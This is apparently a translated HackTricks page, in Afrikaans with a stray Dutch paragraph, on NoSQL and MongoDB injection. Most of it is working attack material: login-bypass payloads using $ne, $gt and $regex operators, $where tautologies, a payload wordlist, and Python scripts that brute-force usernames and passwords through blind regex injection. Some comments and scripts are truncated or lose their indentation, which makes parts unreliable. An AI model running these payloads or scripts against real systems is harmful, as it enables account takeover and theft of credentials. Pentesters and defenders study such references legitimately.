# NoSQL inspuiting
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## Uitbuiting
In PHP kan jy 'n Array stuur deur die gestuurde parameter te verander van _parameter=foo_ na _parameter\[arrNaam]=foo._
Die uitbuitings is gebaseer op die byvoeging van 'n **Operateur**:
username[$ne]=1$password[$ne]=1 #
username[$regex]=^adm$password[$ne]=1 #Check a , could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 #Use the to find the length of a value
username[$eq]=admin&password[$ne]=1 #
username[$ne]=admin&pass[$lt]=s #, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s #
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 # (not test and not admin)
{ $where: "this.credits == this.debits" }#, can be used to execute code
### Basiese verifikasie omseil
**Deur nie gelyk ($ne) of groter ($gt) te gebruik**
#in URL
#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
### **SQL - Mongo**
#### **NoSQL Injection**
NoSQL-injectie is een type aanval dat gericht is op NoSQL-databases, zoals MongoDB. Net als SQL-injectie kunnen aanvallers kwaadaardige code invoegen om gegevens te stelen, wijzigen of verwijderen. Het is belangrijk om invoervalidatie en parameterisatie toe te passen om NoSQL-injectie te voorkomen.
query = { $where: `this.username == '${username}'` }
'n Aanvaller kan dit uitbuit deur strings soos `admin' || 'a'=='a` in te voer, wat die navraag laat terugkeer deur aan die voorwaarde te voldoen met 'n tautologie (`'a'=='a`). Dit is analogies aan SQL-injeksie aanvalle waar insette soos `' or 1=1-- -` gebruik word om SQL-navrae te manipuleer. In MongoDB kan soortgelyke inspuitings gedoen word deur insette soos `' || 1==1//`, `' || 1==1%00`, of `admin' || 'a'=='a`.
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1// or ' || 1==1%00 or admin' || 'a'=='a
### Haal **lengte** inligting uit
# True if the length equals 1,3...
### Haal **data**-inligting uit
in URL (if length == 3)
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
### **SQL - Mongo**
/?search=admin' && this.password%00 --> Check if the field password exists
/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
/?search=admin' && this.password && this.password.match(/^a.*$/)%00
/?search=admin' && this.password && this.password.match(/^b.*$/)%00
/?search=admin' && this.password && this.password.match(/^c.*$/)%00
/?search=admin' && this.password && this.password.match(/^duvj.*$/)%00
/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00 Found
### PHP Willekeurige Funksie Uitvoering
Deur die gebruik van die **$func** operator van die [MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite) biblioteek (standaard gebruik) is dit moontlik om 'n willekeurige funksie uit te voer soos in [hierdie verslag](https://swarm.ptsecurity.com/rce-cockpit-cms/).
"user":{"$func": "var_dump"}
![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit_auth_check_10.png](<../.gitbook/assets/image (468).png>)
### Kry inligting vanaf verskillende versamelings
Dit is moontlik om [**$lookup**](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/) te gebruik om inligting vanaf 'n ander versameling te kry. In die volgende voorbeeld lees ons vanaf 'n **verskillende versameling** genaamd **`users`** en kry die **resultate van al die inskrywings** met 'n wagwoord wat ooreenstem met 'n wild card.
**NOTA:** `$lookup` en ander aggregasiefunksies is slegs beskikbaar as die `aggregate()`-funksie gebruik is om die soektog uit te voer in plaas van die meer algemene `find()` of `findOne()`-funksies.
"from": "users",
"as":"resultado","pipeline": [
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome te bou** en te **outomatiseer** met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
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## MongoDB Aanvalle
Lys [vanaf hier](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
|| 1==1//
|| 1==1%00
}, { password : /.*/ }
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
{$gt: ''}
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
## Blinde NoSQL-skrip
import requests, string
alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(21):
print("[i] Looking for char number "+str(i+1))
for char in alphabet:
r = requests.get("http://chall.com?param=^"+flag+char)
if ("" in r.text):
flag += char
print("[+] Flag: "+flag)
import requests
import urllib3
import string
import urllib
while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
### Brute-force login gebruikersname en wagwoorde vanaf POST-aanmelding
Dit is 'n eenvoudige skripsie wat jy kan wysig, maar die vorige gereedskap kan ook hierdie taak verrig.
import requests
import string
url = "http://example.com"
headers = {"Host": "exmaple.com"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
def get_password(username):
print("Extracting password of "+username)
params = {"username":username, "password[$regex]":"", "login": "login"}
password = "^"
while True:
for c in possible_chars:
params["password[$regex]"] = password + c + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
password += c
if c == possible_chars[-1]:
print("Found password "+password[1:].replace("\\", "")+" for username "+username)
return password[1:].replace("\\", "")
def get_usernames(prefix):
usernames = []
params = {"username[$regex]":"", "password[$regex]":".*"}
for c in possible_chars:
username = "^" + prefix + c
params["username[$regex]"] = username + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
for user in get_usernames(prefix + c):
return usernames
for u in get_usernames(""):
## Gereedskap
* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)
* [https://github.com/C4l1b4n/NoSQL-Attack-Suite](https://github.com/C4l1b4n/NoSQL-Attack-Suite)
## Verwysings
* [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
* [https://nullsweep.com/a-nosql-injection-primer-with-mongo/](https://nullsweep.com/a-nosql-injection-primer-with-mongo/)
* [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb)
Leer AWS-hacking vanaf nul tot held methtARTE (HackTricks AWS Red Team Expert)!
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Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik te bou en **outomatiseer werkafvloei** aangedryf deur die wêreld se **mees gevorderde** gemeenskapshulpmiddels.\
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